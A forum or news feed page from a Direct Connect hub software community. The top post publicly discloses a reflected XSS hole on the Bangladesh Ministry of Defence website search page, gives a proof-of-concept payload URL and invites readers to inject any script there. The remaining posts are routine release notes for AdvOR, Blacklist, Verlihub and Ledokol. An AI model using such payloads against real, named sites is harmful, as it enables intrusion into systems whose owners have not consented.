Ministry of Defence of Bangladesh - XSS

Vulnerable page: http://www.mod.gov.bd/site/search?key=

PoC
http://www.mod.gov.bd/site/search?key=<!--<img%20src="--><img%20src=x%20onerror=alert(1)//">

You can either include any XSS code in search input box, or request any XSS code directly using GET method and key parameter.



Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Posted by Neo on 2017-09-07 22:040 comments1 like

AdvOR 0.3.1.4

Changes in 0.3.1.4
- geoip_c.h was updated with GeoIPCountryWhois.csv released on June 7'th; there are 153678 IP ranges having 32 ranges in the fake "A1" country; 31 ranges were approximated to real countries
- the OpenSSL library was updated to 1.1.0f

File information: AdvOR 0.3.1.4
Posted by advor on 2017-06-11 10:480 comments2 likes

Blacklist 1.2.2.6

Changes in 1.2.2.6
# 1.2.2.6 - Fixed bypass of public proxy lookup for local and private IP addresses in chat mode

File information: Blacklist 1.2.2.6
Posted by vhpython on 2017-05-22 12:470 comments2 likes

Verlihub 1.0.3.9

Even more stable.

Changes in 1.0.3.9
Commit log: https://github.com/verlihub/verlihub/commits/master

File information: Verlihub 1.0.3.9
Posted by verlihub on 2017-05-22 12:410 comments2 likes

Ledokol 2.9.3.46

Changes in 2.9.3.46
[ 36] Fixed: Errors on configuration conversion from string to number and vice versa, report by Alexandr
[ 38] Fixed: Lua 5.3 number to string conversions in MySQL queries
[ 39] Fixed: Missing default password value when adding new PM block entry
[ 37] Added: Optional reason to country code gag
[ 40] Added: Optional filter parameter to word ranks command, request by Meka][Meka
[ 41] Added: Split help texts and send on hub help command execution
[ 42] Added: Replacer debug configuration repldebug, request by KCAHDEP
[ 43] Added: IP gag now supports single IP, range or LRE, request by KCAHDEP
[ 44] Added: Forbidden chat nick MyINFO check
[ 45] Added: Column support to Team Elite hublist user search
[ 46] Added: Default type and limit parameters to user logger command, idea by Lord_Zero

File information: Ledokol 2.9.3.46
Posted by ledokol on 2017-05-22 12:340 comments2 likes
« Back • 1 • Next »